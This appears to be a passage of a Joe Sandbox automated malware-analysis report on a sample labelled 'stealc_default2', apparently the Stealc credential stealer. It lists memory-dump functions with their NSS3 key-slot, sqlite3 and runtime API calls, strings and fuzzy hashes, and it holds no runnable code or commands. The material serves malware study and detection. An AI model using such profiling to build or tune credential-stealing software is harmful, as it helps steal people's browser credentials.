                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3136566230-0
                                                                                                                                                                            • Opcode ID: e37cdabb1b7c4d8dfe26535f741bda35fa794a6ad1e86b39ded43d5787fec2e6
                                                                                                                                                                            • Instruction ID: 860c029ff3d97925d80df9943548e5699d655f66f1226b1e4ed5ea109cdf911e
                                                                                                                                                                            • Opcode Fuzzy Hash: e37cdabb1b7c4d8dfe26535f741bda35fa794a6ad1e86b39ded43d5787fec2e6
                                                                                                                                                                            • Instruction Fuzzy Hash: 2841E5B1A00256ABEB109F64DD41BAF7678AF0430CF140538E9196B742E731EA14CBF2
                                                                                                                                                                            APIs
                                                                                                                                                                            • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C8AFCBD
                                                                                                                                                                            • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C8AFCCC
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C8AFCEF
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8AFD32
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C8AFD46
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000001), ref: 6C8AFD51
                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C8AFD6D
                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C8AFD84
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                                                                                                            • String ID: :
                                                                                                                                                                            • API String ID: 183580322-336475711
                                                                                                                                                                            • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                            • Instruction ID: 184d38e1efc7c2b88e9e946cc33eade1f667802598009f9cb9afe4fbe065361d
                                                                                                                                                                            • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                            • Instruction Fuzzy Hash: D53124B2D002195BEB218BE4DE00BAF77A8AF60709F150834DC14A7B00E371E91AC7D2
                                                                                                                                                                            APIs
                                                                                                                                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,6C897D8F,6C897D8F,?,?), ref: 6C896DC8
                                                                                                                                                                              • Part of subcall function 6C8EFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C8EFE08
                                                                                                                                                                              • Part of subcall function 6C8EFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C8EFE1D
                                                                                                                                                                              • Part of subcall function 6C8EFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C8EFE62
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C897D8F,?,?), ref: 6C896DD5
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
                                                                                                                                                                              • Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C
                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C9B8FA0,00000000,?,?,?,?,6C897D8F,?,?), ref: 6C896DF7
                                                                                                                                                                              • Part of subcall function 6C8EB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9C18D0,?), ref: 6C8EB095
                                                                                                                                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C896E35
                                                                                                                                                                              • Part of subcall function 6C8EFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C8EFE29
                                                                                                                                                                              • Part of subcall function 6C8EFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C8EFE3D
                                                                                                                                                                              • Part of subcall function 6C8EFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C8EFE6F
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C896E4C
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F116E
                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C9B8FE0,00000000), ref: 6C896E82
                                                                                                                                                                              • Part of subcall function 6C896AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C89B21D,00000000,00000000,6C89B219,?,6C896BFB,00000000,?,00000000,00000000,?,?,?,6C89B21D), ref: 6C896B01
                                                                                                                                                                              • Part of subcall function 6C896AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C896B8A
                                                                                                                                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C896F1E
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C896F35
                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C9B8FE0,00000000), ref: 6C896F6B
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000,6C897D8F,?,?), ref: 6C896FE1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 587344769-0
                                                                                                                                                                            • Opcode ID: 979a64ca3d6bb6b4285ff00bc1c3ab3a5a6ca43255169c49c5f5b8da985fd0ac
                                                                                                                                                                            • Instruction ID: b1a8d174e0147f191694a708125a529cdfa6497269bb360723a5ab0eee9409a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 979a64ca3d6bb6b4285ff00bc1c3ab3a5a6ca43255169c49c5f5b8da985fd0ac
                                                                                                                                                                            • Instruction Fuzzy Hash: C171A071E102469BDB10CF19CE40BAABBA4BF95348F154629E809D7B11F730EA94CBD0
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAE10
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAE24
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,6C8BD079,00000000,00000001), ref: 6C8DAE5A
                                                                                                                                                                            • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAE6F
                                                                                                                                                                            • free.MOZGLUE(85145F8B,?,?,?,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAE7F
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAEB1
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAEC9
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAEF1
                                                                                                                                                                            • free.MOZGLUE(6C8BCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8BCDBB,?), ref: 6C8DAF0B
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C8BCDBB,?,6C8BD079,00000000,00000001), ref: 6C8DAF30
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 161582014-0
                                                                                                                                                                            • Opcode ID: 2ac16e81d8f551dd64312da654870f649023077556a5195748e55ec772e3cb5c
                                                                                                                                                                            • Instruction ID: ae9be3e35dfe57ba3e3f6a3f1aff5cc62991871c9d35400e3d639693427bba33
                                                                                                                                                                            • Opcode Fuzzy Hash: 2ac16e81d8f551dd64312da654870f649023077556a5195748e55ec772e3cb5c
                                                                                                                                                                            • Instruction Fuzzy Hash: 9151C1B1A04602AFDB10DF29D984B99B7B4FF08318F254A64D81897F11E731F864CBD1
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C8BAB7F,?,00000000,?), ref: 6C8B4CB4
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C,?,6C8BAB7F,?,00000000,?), ref: 6C8B4CC8
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,6C8BAB7F,?,00000000,?), ref: 6C8B4CE0
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,6C8BAB7F,?,00000000,?), ref: 6C8B4CF4
                                                                                                                                                                            • PL_HashTableLookup.NSS3(?,?,?,6C8BAB7F,?,00000000,?), ref: 6C8B4D03
                                                                                                                                                                            • PR_Unlock.NSS3(?,00000000,?), ref: 6C8B4D10
                                                                                                                                                                              • Part of subcall function 6C93DD70: TlsGetValue.KERNEL32 ref: 6C93DD8C
                                                                                                                                                                              • Part of subcall function 6C93DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4
                                                                                                                                                                            • PR_Now.NSS3(?,00000000,?), ref: 6C8B4D26
                                                                                                                                                                              • Part of subcall function 6C959DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C9A0A27), ref: 6C959DC6
                                                                                                                                                                              • Part of subcall function 6C959DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C9A0A27), ref: 6C959DD1
                                                                                                                                                                              • Part of subcall function 6C959DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C959DED
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C8B4D98
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C8B4DDA
                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C8B4E02
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4032354334-0
                                                                                                                                                                            • Opcode ID: fbbaa879f08b81e99fa233c90651d5e815b9b268cae4a98936b76e6c2e6becdd
                                                                                                                                                                            • Instruction ID: 9ef90a66e7f1cbcadf0dd6f66f783249d8a490a68ce5def4d6b05a8219d7d581
                                                                                                                                                                            • Opcode Fuzzy Hash: fbbaa879f08b81e99fa233c90651d5e815b9b268cae4a98936b76e6c2e6becdd
                                                                                                                                                                            • Instruction Fuzzy Hash: 11414BB5904205ABEB209F68ED4196A77B8FF95219F084930EC18D7B12FB31E924C7D1
                                                                                                                                                                            APIs
                                                                                                                                                                            • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C892CDA,?,00000000), ref: 6C892E1E
                                                                                                                                                                              • Part of subcall function 6C8EFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C899003,?), ref: 6C8EFD91
                                                                                                                                                                              • Part of subcall function 6C8EFD80: PORT_Alloc_Util.NSS3(A4686C8F,?), ref: 6C8EFDA2
                                                                                                                                                                              • Part of subcall function 6C8EFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C8F,?,?), ref: 6C8EFDC4
                                                                                                                                                                            • SECITEM_DupItem_Util.NSS3(?), ref: 6C892E33
                                                                                                                                                                              • Part of subcall function 6C8EFD80: free.MOZGLUE(00000000,?,?), ref: 6C8EFDD1
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C892E4E
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C892E5E
                                                                                                                                                                            • PL_HashTableLookup.NSS3(?), ref: 6C892E71
                                                                                                                                                                            • PL_HashTableRemove.NSS3(?), ref: 6C892E84
                                                                                                                                                                            • PL_HashTableAdd.NSS3(?,00000000), ref: 6C892E96
                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6C892EA9
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C892EB6
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C892EC5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3332421221-0
                                                                                                                                                                            • Opcode ID: f56045a7fbb266f3e19f3573ed59b39d469b5c2893fa11c58f776c89865d206b
                                                                                                                                                                            • Instruction ID: ab0d7018741af317a1504fa374fb88e6a238a07c166d98af826c5e385f425c25
                                                                                                                                                                            • Opcode Fuzzy Hash: f56045a7fbb266f3e19f3573ed59b39d469b5c2893fa11c58f776c89865d206b
                                                                                                                                                                            • Instruction Fuzzy Hash: ED21F572E04145A7EF216A2CFD49A9E3A74EBA220DF180830ED2886712F732D558D6A1
                                                                                                                                                                            APIs
                                                                                                                                                                            • sqlite3_initialize.NSS3 ref: 6C87FD18
                                                                                                                                                                            • sqlite3_initialize.NSS3 ref: 6C87FD5F
                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C87FD89
                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C87FD99
                                                                                                                                                                            • sqlite3_free.NSS3(00000000), ref: 6C87FE3C
                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6C87FEE3
                                                                                                                                                                            • sqlite3_free.NSS3(?), ref: 6C87FEEE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                                                                                                            • String ID: simple
                                                                                                                                                                            • API String ID: 1130978851-3246079234
                                                                                                                                                                            • Opcode ID: b6a24881dcd0ebc020bc7e184a3f7bf42d89a2503f34f08395095e8fff634b93
                                                                                                                                                                            • Instruction ID: 12b28cc5e1063da6c98d9d857be2e6db04b77e409033a72411c1f0ada5be83e0
                                                                                                                                                                            • Opcode Fuzzy Hash: b6a24881dcd0ebc020bc7e184a3f7bf42d89a2503f34f08395095e8fff634b93
                                                                                                                                                                            • Instruction Fuzzy Hash: D0916471A052058FDB24CF5ACA80A6EBBF1FF95318F25C968D8199B751E731E841CB60
                                                                                                                                                                            APIs
                                                                                                                                                                            • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C885EC9
                                                                                                                                                                            • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C885EED
                                                                                                                                                                            Strings
                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6C885EE0
                                                                                                                                                                            • unable to close due to unfinalized statements or unfinished backups, xrefs: 6C885E64
                                                                                                                                                                            • misuse, xrefs: 6C885EDB
                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C885ED1
                                                                                                                                                                            • API call with %s database connection pointer, xrefs: 6C885EC3
                                                                                                                                                                            • invalid, xrefs: 6C885EBE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                            • API String ID: 632333372-1982981357
                                                                                                                                                                            • Opcode ID: 06639c019bc9d2a593c4e9af280a988a420a339c22af0634d8ce77276fe88ff5
                                                                                                                                                                            • Instruction ID: 6eab5f6c1b0f9586a27bab203dae4d78776d03f974d0191e0a689b5f33ba5fbf
                                                                                                                                                                            • Opcode Fuzzy Hash: 06639c019bc9d2a593c4e9af280a988a420a339c22af0634d8ce77276fe88ff5
                                                                                                                                                                            • Instruction Fuzzy Hash: F8819F30B077169BFB298E19CA48B6A77B0BF41309F284A69D8175BF51D730E842CBD1
                                                                                                                                                                            APIs
                                                                                                                                                                            • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C86DDF9
                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C86DE68
                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C86DE97
                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C86DEB6
                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C86DF78
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                            • API String ID: 1526119172-598938438
                                                                                                                                                                            • Opcode ID: 99ab2e79603c6fc9cc16cee3a7edcf97f24a5af0f7045ec864a6cd2a15f9ce5a
                                                                                                                                                                            • Instruction ID: c0ea344993871393ca51edf92b3d7343b4eec9602e36adf176038133e77a5ac3
                                                                                                                                                                            • Opcode Fuzzy Hash: 99ab2e79603c6fc9cc16cee3a7edcf97f24a5af0f7045ec864a6cd2a15f9ce5a
                                                                                                                                                                            • Instruction Fuzzy Hash: 5481B4717043019FD724DF26C580B6A77F1AF85309F258C2EE99A8BE91E731E845C752
                                                                                                                                                                            APIs
                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C81B999), ref: 6C81CFF3
                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C81B999), ref: 6C81D02B
                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C81B999), ref: 6C81D041
                                                                                                                                                                            • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C81B999), ref: 6C96972B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
